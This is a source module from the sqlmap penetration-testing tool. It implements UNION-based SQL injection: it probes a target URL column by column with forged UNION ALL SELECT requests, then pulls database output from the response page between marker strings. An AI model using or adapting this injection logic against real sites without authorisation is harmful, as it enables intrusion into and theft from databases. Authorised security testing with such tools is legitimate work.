#!/usr/bin/env python """ $Id$ This file is part of the sqlmap project, http://sqlmap.sourceforge.net. Copyright (c) 2006-2008 Bernardo Damele A. G. and Daniele Bellucci sqlmap is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with sqlmap; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import time from lib.core.agent import agent from lib.core.common import randomStr from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.data import temp from lib.core.exception import sqlmapUnsupportedDBMSException from lib.core.session import setUnion from lib.core.unescaper import unescaper from lib.parse.html import htmlParser from lib.request.connect import Connect as Request from lib.techniques.inband.union.test import unionTest def __unionPosition(count, expression): logMsg = "confirming inband sql injection on parameter " logMsg += "'%s'" % kb.injParameter logger.info(logMsg) # For each column of the table (# of NULL) perform a request using # the UNION ALL SELECT statement to test it the target url is # affected by an exploitable inband SQL injection vulnerability for exprPosition in range(0, kb.unionCount): # Prepare expression with delimiters randQuery = randomStr() randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryUnescaped = unescaper.unescape(randQueryProcessed) if len(randQueryUnescaped) > len(expression): blankCount = len(randQueryUnescaped) - len(expression) expression = (" " * blankCount) + expression elif len(randQueryUnescaped) < len(expression): blankCount = len(expression) - len(randQueryUnescaped) randQueryUnescaped = (" " * blankCount) + randQueryUnescaped # Forge the inband SQL injection request query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition) payload = agent.payload(newValue=query) # Perform the request resultPage = Request.queryPage(payload, content=True) count += 1 # We have to assure that the randQuery value is not within the # HTML code of the result page because, for instance, it is there # when the query is wrong and the back-end DBMS is Microsoft SQL # server htmlParsed = htmlParser(resultPage, paths.ERRORS_XML) if randQuery in resultPage and not htmlParsed: setUnion(position=exprPosition) break if isinstance(kb.unionPosition, int): logMsg = "the target url is affected by an exploitable " logMsg += "inband sql injection vulnerability" logger.info(logMsg) else: warnMsg = "the target url is not affected by an exploitable " warnMsg += "inband sql injection vulnerability, sqlmap will " warnMsg += "retrieve the expression output through blind sql " warnMsg += "injection technique" logger.warn(warnMsg) return count def unionUse(expression): """ This function tests for an inband SQL injection on the target url then call its subsidiary function to effectively perform an inband SQL injection on the affected url """ count = 0 origExpr = expression start = time.time() if not kb.unionCount: unionTest() if not kb.unionCount: return # Prepare expression with delimiters expression = agent.concatQuery(expression) expression = unescaper.unescape(expression) # Confirm the inband SQL injection and get the exact column # position only once if not isinstance(kb.unionPosition, int): count = __unionPosition(count, expression) # Assure that the above function found the exploitable inband # SQL injection position if not isinstance(kb.unionPosition, int): return # Forge the inband SQL injection request query = agent.forgeInbandQuery(expression) payload = agent.payload(newValue=query) logMsg = "query: %s" % query logger.info(logMsg) # Perform the request resultPage = Request.queryPage(payload, content=True) count += 1 if temp.start not in resultPage or temp.stop not in resultPage: return duration = int(time.time() - start) logMsg = "performed %d queries in %d seconds" % (count, duration) logger.info(logMsg) # Parse the returned page to get the exact inband # sql injection output startPosition = resultPage.index(temp.start) endPosition = resultPage.rindex(temp.stop) + len(temp.stop) value = str(resultPage[startPosition:endPosition]) return value